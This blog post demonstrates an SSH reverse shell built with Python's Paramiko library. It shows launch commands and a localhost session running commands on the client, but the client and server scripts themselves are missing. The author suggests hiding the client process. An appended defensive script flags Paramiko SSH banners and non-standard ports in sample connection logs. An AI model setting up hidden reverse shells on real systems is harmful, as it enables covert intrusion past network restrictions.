Black Hat Python — Reverse Shells using SSH and Paramiko
Aug 23, 2017

A couple of posts ago, I demonstrated a script that used Python sockets to establish a TCP session with a server and execute commands remotely using the subprocess module. You can check it out here. In this post, we will do something similar, but using SSH and executing commands on the client from the server. This has a couple of advantages:
- Using an SSH tunnel, traffic is now encrypted. That's a very nice benefit!
- You are executing commands on a client rather than a listening server, so this can be handy in a restrictive network environment. For example, the terminal you would like to execute commands on only has outbound SSH access. In this case, we establish a ‘reverse shell’ on the server and send commands to the client.

SSH client script:
SSH server script:
Testing it out:
SSH Server:
python3 ch2_ssh_server.py 127.0.0.1 22022 username password
[*] Bind Success for SSH Server using 127.0.0.1:22022
[*] Listening
[*] Incoming TCP Connection from 127.0.0.1:63333
[*] SSH Parameters Negotiation Succeeded
[*] Authenticating
[*] SSH Client Authenticated
<Shell:#> df -h
Filesystem Size Used Avail Capacity iused ifree %iused Mounted on
/dev/disk1 465Gi 432Gi 32Gi 94% 113391753 8451957 93% /
devfs 395Ki 395Ki 0Bi 100% 1367 0 100% /dev
map -hosts 0Bi 0Bi 0Bi 100% 0 0 100% /net
map auto_home 0Bi 0Bi 0Bi 100% 0 0 100% /home
localhost:/onaFBFVIRH7yK-OrLpwGnl 465Gi 465Gi 0Bi 100% 0 0 100% /Volumes/MobileBackups
/dev/disk5 953Gi 8.4Gi 945Gi 1% 2193574 247692264 1% /Volumes/Backups
<Shell:#> date
Wed Aug 23 16:14:42 GST 2017
<Shell:#>
SSH Client:
python3 ch2_ssh_client.py 127.0.0.1 22022 username password
Thinking maliciously, I suppose if the SSH client session/process can be hidden in some way, this approach is much more elegant than using sockets. Hope this post is helpful. I certainly enjoyed learning the topic!
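From the defender's side, the encryption noted above hides the commands but not the SSH handshake: the version banner each side sends and the destination port stay visible on the wire. The following is an added example, not code from the original post, that flags sessions in connection records where either banner names the Paramiko library or the server port is not 22. The tab-separated record layout, the allowlist parameter and the sample lines are constructed assumptions; the prefix `SSH-2.0-paramiko_` is the version string Paramiko sends by default.

```python
import csv
import io

# Constructed sample records (not real traffic). Assumed layout, tab-separated:
# timestamp, src_ip, dst_ip, dst_port, client_banner, server_banner
SAMPLE_LOG = """\
2017-08-23T12:14:01Z\t10.0.0.15\t203.0.113.10\t22\tSSH-2.0-OpenSSH_7.4\tSSH-2.0-OpenSSH_7.2
2017-08-23T12:14:40Z\t10.0.0.23\t203.0.113.77\t22022\tSSH-2.0-paramiko_2.2.1\tSSH-2.0-paramiko_2.2.1
2017-08-23T12:15:02Z\t10.0.0.31\t198.51.100.5\t2222\tSSH-2.0-OpenSSH_7.4\tSSH-2.0-OpenSSH_6.6
2017-08-23T12:16:19Z\t10.0.0.23\t203.0.113.80\t22\tSSH-2.0-paramiko_2.2.1\tSSH-2.0-OpenSSH_7.2
malformed line without enough fields
"""

STANDARD_SSH_PORTS = {22}
LIBRARY_BANNER_PREFIX = "SSH-2.0-paramiko_"  # Paramiko's default version string


def score_record(row):
    """Return the list of reasons a single parsed record looks unusual."""
    _, _, _, port, client, server = row
    reasons = []
    if int(port) not in STANDARD_SSH_PORTS:
        reasons.append("non-standard port %s" % port)
    if client.startswith(LIBRARY_BANNER_PREFIX):
        reasons.append("scripted client banner")
    if server.startswith(LIBRARY_BANNER_PREFIX):
        reasons.append("scripted server banner")
    return reasons


def find_suspicious(log_text, allowlist=frozenset()):
    """Return (src, dst, port, reasons) for flagged sessions, skipping bad lines."""
    findings = []
    for row in csv.reader(io.StringIO(log_text), delimiter="\t"):
        if len(row) != 6 or not row[3].isdigit():
            continue  # tolerate truncated or malformed records
        src, dst, port = row[1], row[2], int(row[3])
        if (src, dst) in allowlist:
            continue  # known automation, e.g. a deployment host (hypothetical)
        reasons = score_record(row)
        if reasons:
            findings.append((src, dst, port, reasons))
    return findings


if __name__ == "__main__":
    for src, dst, port, reasons in find_suspicious(SAMPLE_LOG):
        print("%s -> %s:%d  %s" % (src, dst, port, "; ".join(reasons)))
```

Legitimate automation also uses Paramiko, so a banner match on its own is a triage signal; the allowlist is where known source and destination pairs are recorded.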